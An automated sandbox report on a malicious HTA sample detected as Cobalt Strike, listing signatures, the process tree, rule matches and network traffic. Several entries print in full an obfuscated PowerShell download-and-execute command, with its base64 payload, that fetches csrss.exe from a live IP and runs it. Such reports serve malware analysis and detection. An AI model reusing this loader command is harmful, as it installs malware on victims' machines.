Windows Analysis Report
sdf.hta

Overview

General Information

Sample name:sdf.hta
Analysis ID:1665127
MD5:73f9f8f8c9738f49854820688beae627
SHA1:467d5d213bd6f827aab35d5404eb01792bf19213
SHA256:8335aea59fc0f9ed4542db9221ee7e2c5ea6d7df36fe31ba7fe04bff878717a0
Tags: hta, user-abuse_ch

Detection

Cobalt Strike
Score:92
Range:0 - 100
Confidence:100%

Signatures

Detected Cobalt Strike Beacon
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 7400 cmdline: mshta.exe "C:\Users\user\Desktop\sdf.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7500 cmdline: "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7552 cmdline: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7772 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" "c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
  • svchost.exe (PID: 7732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source: amsi32_7552.amsi.csv
Rule: JoeSecurity_PowershellDecodeAndExecute
Description: Yara detected Powershell decode and execute
Author: Joe Security

    System Summary

    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; 
iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2U
    Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7552, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", ProcessId: 7688, ProcessName: csc.exe
    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7552, TargetFilename: C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))", CommandLine: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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
    Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7732, ProcessName: svchost.exe

    Data Obfuscation

    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLD
ApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7552, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline", ProcessId: 7688, ProcessName: csc.exe
    No Suricata rule has matched

    AV Detection

    Source: sdf.hta | ReversingLabs: Detection: 30%
    Source: Submitted Sample | Neural Call Log Analysis: 98.1%
    Source: Binary string: q7C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.pdb source: powershell.exe, 00000003.00000002.1268592235.00000000053C1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb. source: powershell.exe, 00000003.00000002.1275318772.0000000007799000.00000004.00000020.00020000.00000000.sdmp
    Source: Joe Sandbox View | IP Address: 172.245.191.88
    Source: global traffic | HTTP traffic detected: GET /620/csrss.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: 172.245.191.88; Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.191.88
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04BE7A18 URLDownloadToFileW,3_2_04BE7A18
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 15 Apr 2025 14:44:12 GMT; Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28; Content-Length: 301; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Server at 172.245.191.88 Port 80</address></body></html>
    Source: powershell.exe, 00000003.00000002.1268592235.00000000053C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://172.245.191.88/620/csrss.
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.191.88/620/csrss.exe
    Source: powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.191.88/620/csrss.exe#
    Source: powershell.exe, 00000003.00000002.1275197546.0000000007730000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
    Source: svchost.exe, 00000005.00000002.2396772651.0000020AE7400000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE7618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: edb.log.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
    Source: edb.log.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: edb.log.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE7618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE7618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE764D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: edb.log.5.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000003.00000002.1268592235.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.1277241225.00000000087D7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 00000003.00000002.1268592235.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
    Source: edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
    Source: edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
    Source: edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
    Source: edb.log.5.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

    System Summary

    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))"
    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
    Source: classification engine | Classification label: mal92.expl.evad.winHTA@11/15@0/2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfj5lpnj.mgi.ps1
    Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\sdf.hta"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"
    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" "c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP"
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
